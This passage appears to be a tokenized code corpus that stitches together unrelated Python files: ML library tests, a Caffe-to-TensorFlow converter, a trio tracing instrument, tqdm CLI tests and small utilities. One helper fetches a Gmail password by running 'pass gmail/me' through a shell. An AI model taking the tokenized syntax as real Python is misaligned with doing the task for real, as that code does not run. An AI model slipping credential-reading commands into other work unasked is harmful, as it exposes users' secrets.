nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LSML(tol=0.1))) remove_spaces(f"LSML({merged_kwargs})"))<line_sep>def_kwargs={'max_iter':1000 'num_constraints':<none> 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'tol':0.001 'verbose':<false> 'weights':<none>}<line_sep>nndef_kwargs={'verbose':<true>}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.LSML_Supervised(verbose=<true>))) remove_spaces(f"LSML_Supervised({merged_kwargs})"))<block_end><def_stmt>test_sdml self<block_start>def_kwargs={'balance_param':0.5 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'sparsity_param':0.01 'verbose':<false>}<line_sep>nndef_kwargs={'verbose':<true>}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.SDML(verbose=<true>))) remove_spaces(f"SDML({merged_kwargs})"))<line_sep>def_kwargs={'balance_param':0.5 'num_constraints':<none> 'preprocessor':<none> 'prior':'identity' 'random_state':<none> 'sparsity_param':0.01 'verbose':<false>}<line_sep>nndef_kwargs={'sparsity_param':0.5}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.SDML_Supervised(sparsity_param=0.5))) remove_spaces(f"SDML_Supervised({merged_kwargs})"))<block_end><def_stmt>test_rca self<block_start>def_kwargs={'n_components':<none> 'preprocessor':<none>}<line_sep>nndef_kwargs={'n_components':3}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.RCA(n_components=3))) remove_spaces(f"RCA({merged_kwargs})"))<line_sep>def_kwargs={'chunk_size':2 'n_components':<none> 'num_chunks':100 'preprocessor':<none> 'random_state':<none>}<line_sep>nndef_kwargs={'num_chunks':5}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.RCA_Supervised(num_chunks=5))) remove_spaces(f"RCA_Supervised({merged_kwargs})"))<block_end><def_stmt>test_mlkr self<block_start>def_kwargs={'init':'auto' 'max_iter':1000 'n_components':<none> 'preprocessor':<none> 'random_state':<none> 'tol':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'max_iter':777}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.MLKR(max_iter=777))) remove_spaces(f"MLKR({merged_kwargs})"))<block_end><def_stmt>test_mmc self<block_start>def_kwargs={'convergence_threshold':0.001 'diagonal':<false> 'diagonal_c':1.0 'init':'identity' 'max_iter':100 'max_proj':10000 'preprocessor':<none> 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'diagonal':<true>}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.MMC(diagonal=<true>))) remove_spaces(f"MMC({merged_kwargs})"))<line_sep>def_kwargs={'convergence_threshold':1e-06 'diagonal':<false> 'diagonal_c':1.0 'init':'identity' 'max_iter':100 'max_proj':10000 'num_constraints':<none> 'preprocessor':<none> 'random_state':<none> 'verbose':<false>}<line_sep>nndef_kwargs={'max_iter':1}<line_sep>merged_kwargs=sk_repr_kwargs(def_kwargs nndef_kwargs)<line_sep>self.assertEqual(remove_spaces(str(metric_learn.MMC_Supervised(max_iter=1))) remove_spaces(f"MMC_Supervised({merged_kwargs})"))<block_end><block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners 
ids=ids_metric_learners)<def_stmt>test_get_metric_is_independent_from_metric_learner estimator build_dataset<block_start>"""Tests that the get_metric method returns a function that is independent from the original metric learner"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep># we fit the metric learner on it and then we compute the metric on some # points model.fit(*remove_y(model input_data labels))<line_sep>metric=model.get_metric()<line_sep>score=metric(X[0] X[1])<line_sep># then we refit the estimator on another dataset model.fit(*remove_y(model np.sin(input_data) labels))<line_sep># we recompute the distance between the two points: it should be the same score_bis=metric(X[0] X[1])<assert_stmt>score_bis<eq>score<block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners ids=ids_metric_learners)<def_stmt>test_get_metric_raises_error estimator build_dataset<block_start>"""Tests that the metric returned by get_metric raises errors similar to the distance functions in scipy.spatial.distance"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.fit(*remove_y(model input_data labels))<line_sep>metric=model.get_metric()<line_sep>list_test_get_metric_raises=[(X[0].tolist()+[5.2] X[1]) # vectors with # different dimensions (X[0:4] X[1:5]) # 2D vectors (X[0].tolist()+[5.2] X[1]+[7.2])]<line_sep># vectors of same dimension but incompatible with what the metric learner # was trained on <for_stmt>u,v list_test_get_metric_raises<block_start><with_stmt>pytest.raises(ValueError)<block_start>metric(u v)<block_end><block_end><block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners ids=ids_metric_learners)<def_stmt>test_get_metric_works_does_not_raise estimator build_dataset<block_start>"""Tests that the metric returned by get_metric does not raise errors (or warnings) similarly to the distance functions in scipy.spatial.distance"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.fit(*remove_y(model input_data labels))<line_sep>metric=model.get_metric()<line_sep>list_test_get_metric_doesnt_raise=[(X[0] X[1]) (X[0].tolist() X[1].tolist()) (X[0][<none>] X[1][<none>])]<for_stmt>u,v list_test_get_metric_doesnt_raise<block_start><with_stmt>pytest.warns(<none>)<as>record<block_start>metric(u v)<block_end><assert_stmt>len(record)<eq>0<block_end># Test that the scalar case works model.components_=np.array([3.1])<line_sep>metric=model.get_metric()<for_stmt>u,v [(5 6.7) ([5] [6.7]) ([[5]] [[6.7]])]<block_start><with_stmt>pytest.warns(<none>)<as>record<block_start>metric(u v)<block_end><assert_stmt>len(record)<eq>0<block_end><block_end>@pytest.mark.parametrize('estimator, build_dataset' metric_learners ids=ids_metric_learners)<def_stmt>test_n_components estimator build_dataset<block_start>"""Check that estimators that have a n_components parameters can use it and that it actually works as expected"""<line_sep>input_data,labels,_,X=build_dataset()<line_sep>model=clone(estimator)<if_stmt>hasattr(model 'n_components')<block_start>set_random_state(model)<line_sep>model.set_params(n_components=<none>)<line_sep>model.fit(*remove_y(model input_data labels))<assert_stmt>model.components_.shape<eq>(X.shape[1] 
X.shape[1])<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.set_params(n_components=X.shape[1]-1)<line_sep>model.fit(*remove_y(model input_data labels))<assert_stmt>model.components_.shape<eq>(X.shape[1]-1 X.shape[1])<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.set_params(n_components=X.shape[1]+1)<with_stmt>pytest.raises(ValueError)<as>expected_err<block_start>model.fit(*remove_y(model input_data labels))<block_end><assert_stmt>(str(expected_err.value)<eq>'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))<line_sep>model=clone(estimator)<line_sep>set_random_state(model)<line_sep>model.set_params(n_components=0)<with_stmt>pytest.raises(ValueError)<as>expected_err<block_start>model.fit(*remove_y(model input_data labels))<block_end><assert_stmt>(str(expected_err.value)<eq>'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<def_stmt>find_bash <block_start><import_stmt>os<if_stmt>os.name<eq>'nt'<block_start><return>_find_windows_bash()<block_end><return>'/bin/bash'<block_end><def_stmt>_find_windows_bash <block_start>winreg=_winreg_module()<import_stmt>csv<line_sep>StringIO=_get_string_io()<import_from_stmt>os.path dirname<line_sep>sub_key='Directory\\shell\\git_shell\\command'<line_sep>value=winreg.QueryValue(winreg.HKEY_CLASSES_ROOT sub_key)<with_stmt>StringIO(value)<as>file<block_start>reader=csv.reader(file delimiter=' ' quotechar='"')<line_sep>git_bash_location=list(reader)[0][0]<line_sep>git_bash_directory=git_bash_location.split('\\git-bash.exe')[0]<line_sep>bash_location=git_bash_directory+'\\bin\\bash.exe'<line_sep><return>bash_location<block_end><block_end><def_stmt>_get_string_io <block_start><try_stmt><block_start><import_from_stmt>StringIO StringIO<block_end><except_stmt>ImportError<block_start><import_from_stmt>io StringIO<block_end><return>StringIO<block_end><def_stmt>_winreg_module <block_start><import_stmt>winreg<line_sep><return>winreg<block_end>
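# A minimal usage sketch for find_bash() defined above: locate bash and run a
# trivial command through it. The subprocess call and the echoed text are
# illustrative assumptions, not part of the original helper; on Windows this
# only works when the Git for Windows registry key queried above actually exists.
import subprocess

if __name__ == "__main__":
    bash = find_bash()  # '/bin/bash' on POSIX, Git Bash's bash.exe on Windows
    output = subprocess.check_output([bash, "-c", "echo hello from bash"])
    print(output.decode().strip())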
<import_from_stmt>vint.ast.node_type NodeType<import_from_stmt>vint.ast.plugin.scope_plugin.identifier_attribute IDENTIFIER_ATTRIBUTE IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG IDENTIFIER_ATTRIBUTE_MEMBER_FLAG IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT <def_stmt>create_id id_value is_declarative=<true> is_function=<false> is_autoload=<false> is_declarative_parameter=<false> is_on_str_expr_context=<false><block_start><return>{'type':NodeType.IDENTIFIER.value 'value':id_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:is_declarative IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:is_function IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:is_autoload IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:is_declarative_parameter IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:is_on_str_expr_context } }<block_end><def_stmt>create_env env_value<block_start><return>{'type':NodeType.ENV.value 'value':env_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:<true> IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_option opt_value<block_start><return>{'type':NodeType.OPTION.value 'value':opt_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:<true> IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_reg reg_value<block_start><return>{'type':NodeType.REG.value 'value':reg_value IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:<true> IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_curlyname is_declarative=<true><block_start>""" Create a node as a `my_{'var'}` """<line_sep><return>{'type':NodeType.CURLYNAME.value 'value':[{'type':NodeType.CURLYNAMEPART.value 'value':'my_' } {'type':NodeType.CURLYNAMEEXPR.value 'value':{'type':NodeType.CURLYNAMEEXPR.value 'value':'var' } }] IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:is_declarative IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<true> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end><def_stmt>create_subscript_member is_declarative=<true><block_start><return>{'type':NodeType.IDENTIFIER.value 'value':'member' IDENTIFIER_ATTRIBUTE:{IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG:is_declarative IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG:<false> IDENTIFIER_ATTRIBUTE_MEMBER_FLAG:<true> IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG:<false> IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG:<false> IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG:<false> IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT:<false> } }<block_end>
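# A hedged usage sketch for the node builders above, e.g. inside a scope-plugin
# test. It reuses the same vint imports as the original helpers; the identifier
# name 'g:my_var' and the assertions are made up for illustration only.
from vint.ast.node_type import NodeType
from vint.ast.plugin.scope_plugin.identifier_attribute import (
    IDENTIFIER_ATTRIBUTE,
    IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG,
)

def example_identifier_node():
    node = create_id('g:my_var', is_declarative=True)
    assert node['type'] == NodeType.IDENTIFIER.value
    assert node[IDENTIFIER_ATTRIBUTE][IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG] is True
    return node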
#! /usr/bin/env python2 # -*- coding: utf8 -*- <import_from_stmt>subprocess check_output<def_stmt>get_pass <block_start><return>check_output("pass gmail/me" shell=<true>).strip("\n")<block_end>
"""Convert a Caffe model file to TensorFlow checkpoint format. Assume that the network built is a equivalent (or a sub-) to the Caffe definition. """<import_stmt>tensorflow<as>tf<import_from_stmt>nets caffe_scope<import_from_stmt>nets nets_factory<line_sep>slim=tf.contrib.slim<line_sep># =========================================================================== # # Main flags. # =========================================================================== # tf.app.flags.DEFINE_string('model_name' 'ssd_300_vgg' 'Name of the model to convert.')<line_sep>tf.app.flags.DEFINE_string('num_classes' 21 'Number of classes in the dataset.')<line_sep>tf.app.flags.DEFINE_string('caffemodel_path' <none> 'The path to the Caffe model file to convert.')<line_sep>FLAGS=tf.app.flags.FLAGS<line_sep># =========================================================================== # # Main converting routine. # =========================================================================== # <def_stmt>main _# Caffe scope... <block_start>caffemodel=caffe_scope.CaffeScope()<line_sep>caffemodel.load(FLAGS.caffemodel_path)<line_sep>tf.logging.set_verbosity(tf.logging.INFO)<with_stmt>tf.Graph().as_default()<block_start>global_step=slim.create_global_step()<line_sep>num_classes=int(FLAGS.num_classes)<line_sep># Select the network. ssd_class=nets_factory.get_network(FLAGS.model_name)<line_sep>ssd_params=ssd_class.default_params._replace(num_classes=num_classes)<line_sep>ssd_net=ssd_class(ssd_params)<line_sep>ssd_shape=ssd_net.params.img_shape<line_sep># Image placeholder and model. shape=(1 ssd_shape[0] ssd_shape[1] 3)<line_sep>img_input=tf.placeholder(shape=shape dtype=tf.float32)<line_sep># Create model. <with_stmt>slim.arg_scope(ssd_net.arg_scope_caffe(caffemodel))<block_start>ssd_net.net(img_input is_training=<false>)<block_end>init_op=tf.global_variables_initializer()<with_stmt>tf.Session()<as>session# Run the init operation. <block_start>session.run(init_op)<line_sep># Save model in checkpoint. saver=tf.train.Saver()<line_sep>ckpt_path=FLAGS.caffemodel_path.replace('.caffemodel' '.ckpt')<line_sep>saver.save(session ckpt_path write_meta_graph=<false>)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.app.run()<block_end>
<import_stmt>argparse<import_stmt>os.path<as>osp<import_from_stmt>glob glob<import_stmt>cv2<import_stmt>pandas<as>pd<import_from_stmt>tqdm tqdm<import_from_stmt>gwd.converters kaggle2coco<def_stmt>parse_args <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--image-pattern" default="/data/SPIKE_images/*jpg")<line_sep>parser.add_argument("--annotation-root" default="/data/SPIKE_annotations")<line_sep>parser.add_argument("--kaggle_output_path" default="/data/spike.csv")<line_sep>parser.add_argument("--coco_output_path" default="/data/coco_spike.json")<line_sep><return>parser.parse_args()<block_end><def_stmt>main <block_start>args=parse_args()<line_sep>img_paths=glob(args.image_pattern)<line_sep>annotations=[]<for_stmt>img_path tqdm(img_paths)<block_start>ann_path=osp.join(args.annotation_root (osp.basename(img_path.replace("jpg" "bboxes.tsv"))))<line_sep>ann=pd.read_csv(ann_path sep="\t" names=["x_min" "y_min" "x_max" "y_max"])<line_sep>h,w=cv2.imread(img_path).shape[:2]<line_sep>ann[["x_min" "x_max"]]=ann[["x_min" "x_max"]].clip(0 w)<line_sep>ann[["y_min" "y_max"]]=ann[["y_min" "y_max"]].clip(0 h)<line_sep>ann["height"]=h<line_sep>ann["width"]=w<line_sep>ann["bbox_width"]=ann["x_max"]-ann["x_min"]<line_sep>ann["bbox_height"]=ann["y_max"]-ann["y_min"]<line_sep>ann=ann[(ann["bbox_width"]<g>0)&(ann["bbox_height"]<g>0)].copy()<line_sep>ann["bbox"]=ann[["x_min" "y_min" "bbox_width" "bbox_height"]].values.tolist()<line_sep>ann["image_id"]=osp.basename(img_path).split(".")[0]<line_sep>annotations.append(ann)<block_end>annotations=pd.concat(annotations)<line_sep>annotations["source"]="spike"<line_sep>print(annotations.head())<line_sep>annotations[["image_id" "source" "width" "height" "bbox"]].to_csv(args.kaggle_output_path index=<false>)<line_sep>kaggle2coco.main(args.kaggle_output_path args.coco_output_path)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
# Copyright (c) OpenMMLab. All rights reserved. <import_stmt>tempfile<import_from_stmt>mmocr.utils list_from_file list_to_file<line_sep>lists=[[] [' '] ['\t'] ['a'] [1] [1.] ['a' 'b'] ['a' 1 1.] [1 1. 'a'] ['啊' '啊啊'] ['選択' 'noël' 'Информацией' 'ÄÆä'] ]<def_stmt>test_list_to_file <block_start><with_stmt>tempfile.TemporaryDirectory()<as>tmpdirname<block_start><for_stmt>i,lines enumerate(lists)<block_start>filename=f'{tmpdirname}/{i}.txt'<line_sep>list_to_file(filename lines)<line_sep>lines2=[line.rstrip('\r\n')<for>line open(filename 'r' encoding='utf-8').readlines()]<line_sep>lines=list(map(str lines))<assert_stmt>len(lines)<eq>len(lines2)<assert_stmt>all(line1<eq>line2<for>line1,line2 zip(lines lines2))<block_end><block_end><block_end><def_stmt>test_list_from_file <block_start><with_stmt>tempfile.TemporaryDirectory()<as>tmpdirname<block_start><for_stmt>encoding ['utf-8' 'utf-8-sig']<block_start><for_stmt>lineend ['\n' '\r\n']<block_start><for_stmt>i,lines enumerate(lists)<block_start>filename=f'{tmpdirname}/{i}.txt'<with_stmt>open(filename 'w' encoding=encoding)<as>f<block_start>f.writelines(f'{line}{lineend}'<for>line lines)<block_end>lines2=list_from_file(filename encoding=encoding)<line_sep>lines=list(map(str lines))<assert_stmt>len(lines)<eq>len(lines2)<assert_stmt>all(line1<eq>line2<for>line1,line2 zip(lines lines2))<block_end><block_end><block_end><block_end><block_end>
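# A small round-trip sketch with the two utilities exercised by the tests
# above; requires mmocr to be installed, and the temporary file name is arbitrary.
import tempfile

from mmocr.utils import list_from_file, list_to_file

with tempfile.TemporaryDirectory() as tmpdir:
    path = f'{tmpdir}/demo.txt'
    lines = ['a', 'b', '選択']
    list_to_file(path, lines)
    assert list_from_file(path) == lines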
<import_stmt>trio<import_stmt>os<import_stmt>json<import_from_stmt>itertools count<line_sep># Experiment with generating Chrome Event Trace format, which can be browsed # through chrome://tracing or other mechanisms. # # Screenshot: https://files.gitter.im/python-trio/general/fp6w/image.png # # Trace format docs: https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU/preview# # # Things learned so far: # - I don't understand how the ph="s"/ph="f" flow events work – I think # they're supposed to show up as arrows, and I'm emitting them between tasks # that wake each other up, but they're not showing up. # - I think writing out json synchronously from each event is creating gaps in # the trace; maybe better to batch them up to write up all at once at the # end # - including tracebacks would be cool # - there doesn't seem to be any good way to group together tasks based on # nurseries. this really limits the value of this particular trace # format+viewer for us. (also maybe we should have an instrumentation event # when a nursery is opened/closed?) # - task._counter should maybe be public # - I don't know how to best show task lifetime, scheduling times, and what # the task is actually doing on the same plot. if we want to show particular # events like "called stream.send_all", then the chrome trace format won't # let us also show "task is running", because neither kind of event is # strictly nested inside the other <class_stmt>Trace(trio.abc.Instrument)<block_start><def_stmt>__init__ self out<block_start>self.out=out<line_sep>self.out.write("[\n")<line_sep>self.ids=count()<line_sep>self._task_metadata(-1 "I/O manager")<block_end><def_stmt>_write self **ev<block_start>ev.setdefault("pid" os.getpid())<if_stmt>ev["ph"]<ne>"M"<block_start>ev.setdefault("ts" trio.current_time()<times>1e6)<block_end>self.out.write(json.dumps(ev))<line_sep>self.out.write(",\n")<block_end><def_stmt>_task_metadata self tid name<block_start>self._write(name="thread_name" ph="M" tid=tid args={"name":name} )<line_sep>self._write(name="thread_sort_index" ph="M" tid=tid args={"sort_index":tid} )<block_end><def_stmt>task_spawned self task<block_start>self._task_metadata(task._counter task.name)<line_sep>self._write(name="task lifetime" ph="B" tid=task._counter )<block_end><def_stmt>task_exited self task<block_start>self._write(name="task lifetime" ph="E" tid=task._counter )<block_end><def_stmt>before_task_step self task<block_start>self._write(name="running" ph="B" tid=task._counter )<block_end><def_stmt>after_task_step self task<block_start>self._write(name="running" ph="E" tid=task._counter )<block_end><def_stmt>task_scheduled self task<block_start><try_stmt><block_start>waker=trio.lowlevel.current_task()<block_end><except_stmt>RuntimeError<block_start><pass><block_end><else_stmt><block_start>id=next(self.ids)<line_sep>self._write(ph="s" cat="wakeup" id=id tid=waker._counter )<line_sep>self._write(cat="wakeup" ph="f" id=id tid=task._counter )<block_end><block_end><def_stmt>before_io_wait self timeout<block_start>self._write(name=f"I/O wait" ph="B" tid=-1 )<block_end><def_stmt>after_io_wait self timeout<block_start>self._write(name=f"I/O wait" ph="E" tid=-1 )<block_end><block_end><async_keyword><def_stmt>child1 <block_start>print(" child1: started! sleeping now...")<line_sep><await>trio.sleep(1)<line_sep>print(" child1: exiting!")<block_end><async_keyword><def_stmt>child2 <block_start>print(" child2: started! 
sleeping now...")<line_sep><await>trio.sleep(1)<line_sep>print(" child2: exiting!")<block_end><async_keyword><def_stmt>parent <block_start>print("parent: started!")<async_keyword><with_stmt>trio.open_nursery()<as>nursery<block_start>print("parent: spawning child1...")<line_sep>nursery.start_soon(child1)<line_sep>print("parent: spawning child2...")<line_sep>nursery.start_soon(child2)<line_sep>print("parent: waiting for children to finish...")<line_sep># -- we exit the nursery block here -- <block_end>print("parent: all done!")<block_end>t=Trace(open("/tmp/t.json" "w"))<line_sep>trio.run(parent instruments=[t])<line_sep>
<import_from_stmt>typing List<line_sep># Move Zeroes <class_stmt>Solution# Solution 1: use an extra array <block_start><def_stmt>moveZeroes1 self nums:List[int]<arrow><none><block_start>temp,k=[0]<times>len(nums) 0<for_stmt>n nums<block_start><if_stmt>n<ne>0<block_start>temp[k]=n<line_sep>k<augadd>1<block_end><block_end>nums[:]=temp[:]<block_end># Solution 2: two-pointer, in-place swaps <def_stmt>moveZeroes2 self nums:List[int]<arrow><none><block_start>k=0<for_stmt>i,v enumerate(nums)<block_start><if_stmt>v<ne>0<block_start>nums[i],nums[k]=nums[k] nums[i]<line_sep>k<augadd>1<block_end><block_end><block_end><block_end>
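# A quick usage sketch for the Solution above: both methods move the zeros to
# the end in place while preserving the relative order of the non-zero
# elements. The sample input is arbitrary.
nums = [0, 1, 0, 3, 12]
Solution().moveZeroes2(nums)
print(nums)  # -> [1, 3, 12, 0, 0]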
"""Test CLI usage."""<import_stmt>logging<import_stmt>subprocess# nosec <import_stmt>sys<import_from_stmt>functools wraps<import_from_stmt>os linesep<import_from_stmt>tqdm.cli TqdmKeyError TqdmTypeError main<import_from_stmt>tqdm.utils IS_WIN<import_from_stmt>.tests_tqdm BytesIO _range closing mark raises<def_stmt>restore_sys func<block_start>"""Decorates `func(capsysbin)` to save & restore `sys.(stdin|argv)`."""<line_sep>@wraps(func)<def_stmt>inner capsysbin<block_start>"""function requiring capsysbin which may alter `sys.(stdin|argv)`"""<line_sep>_SYS=sys.stdin sys.argv<try_stmt><block_start>res=func(capsysbin)<block_end><finally_stmt><block_start>sys.stdin,sys.argv=_SYS<block_end><return>res<block_end><return>inner<block_end><def_stmt>norm bytestr<block_start>"""Normalise line endings."""<line_sep><return>bytestr<if>linesep<eq>"\n"<else>bytestr.replace(linesep.encode() b"\n")<block_end>@mark.slow<def_stmt>test_pipes <block_start>"""Test command line pipes"""<line_sep>ls_out=subprocess.check_output(['ls'])# nosec ls=subprocess.Popen(['ls'] stdout=subprocess.PIPE)# nosec res=subprocess.Popen(# nosec [sys.executable '-c' 'from tqdm.cli import main; main()'] stdin=ls.stdout stdout=subprocess.PIPE stderr=subprocess.PIPE)<line_sep>out,err=res.communicate()<assert_stmt>ls.poll()<eq>0<line_sep># actual test: <assert_stmt>norm(ls_out)<eq>norm(out)<assert_stmt>b"it/s"<in>err<block_end><if_stmt>sys.version_info[:2]<ge>(3 8)<block_start>test_pipes=mark.filterwarnings("ignore:unclosed file:ResourceWarning")(test_pipes)<block_end><def_stmt>test_main_import <block_start>"""Test main CLI import"""<line_sep>N=123<line_sep>_SYS=sys.stdin sys.argv<line_sep># test direct import sys.stdin=[str(i).encode()<for>i _range(N)]<line_sep>sys.argv=['' '--desc' 'Test CLI import' '--ascii' 'True' '--unit_scale' 'True']<try_stmt><block_start><import_stmt>tqdm.__main__# NOQA, pylint: disable=unused-variable <block_end><finally_stmt><block_start>sys.stdin,sys.argv=_SYS<block_end><block_end>@restore_sys<def_stmt>test_main_bytes capsysbin<block_start>"""Test CLI --bytes"""<line_sep>N=123<line_sep># test --delim IN_DATA='\0'.join(map(str _range(N))).encode()<with_stmt>closing(BytesIO())<as>sys.stdin<block_start>sys.stdin.write(IN_DATA)<line_sep># sys.stdin.write(b'\xff') # TODO sys.stdin.seek(0)<line_sep>main(sys.stderr ['--desc' 'Test CLI delim' '--ascii' 'True' '--delim' r'\0' '--buf_size' '64'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA<assert_stmt>str(N)+"it"<in>err.decode("U8")<block_end># test --bytes IN_DATA=IN_DATA.replace(b'\0' b'\n')<with_stmt>closing(BytesIO())<as>sys.stdin<block_start>sys.stdin.write(IN_DATA)<line_sep>sys.stdin.seek(0)<line_sep>main(sys.stderr ['--ascii' '--bytes=True' '--unit_scale' 'False'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>out<eq>IN_DATA<assert_stmt>str(len(IN_DATA))+"B"<in>err.decode("U8")<block_end><block_end>@mark.skipif(sys.version_info[0]<eq>2 reason="no caplog on py2")<def_stmt>test_main_log capsysbin caplog<block_start>"""Test CLI --log"""<line_sep>_SYS=sys.stdin sys.argv<line_sep>N=123<line_sep>sys.stdin=[(str(i)+'\n').encode()<for>i _range(N)]<line_sep>IN_DATA=b''.join(sys.stdin)<try_stmt><block_start><with_stmt>caplog.at_level(logging.INFO)<block_start>main(sys.stderr ['--log' 'INFO'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<assert_stmt><not>caplog.record_tuples<block_end><with_stmt>caplog.at_level(logging.DEBUG)<block_start>main(sys.stderr ['--log' 
'DEBUG'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<assert_stmt>caplog.record_tuples<block_end><block_end><finally_stmt><block_start>sys.stdin,sys.argv=_SYS<block_end><block_end>@restore_sys<def_stmt>test_main capsysbin<block_start>"""Test misc CLI options"""<line_sep>N=123<line_sep>sys.stdin=[(str(i)+'\n').encode()<for>i _range(N)]<line_sep>IN_DATA=b''.join(sys.stdin)<line_sep># test --tee main(sys.stderr ['--mininterval' '0' '--miniters' '1'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<assert_stmt>N<le>len(err.split(b"\r"))<l>N+5<line_sep>len_err=len(err)<line_sep>main(sys.stderr ['--tee' '--mininterval' '0' '--miniters' '1'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt>norm(out)<eq>IN_DATA<and>b"123/123"<in>err<line_sep># spaces to clear intermediate lines could increase length <assert_stmt>len_err+len(norm(out))<le>len(err)<line_sep># test --null main(sys.stderr ['--null'])<line_sep>out,err=capsysbin.readouterr()<assert_stmt><not>out<and>b"123/123"<in>err<line_sep># test integer --update main(sys.stderr 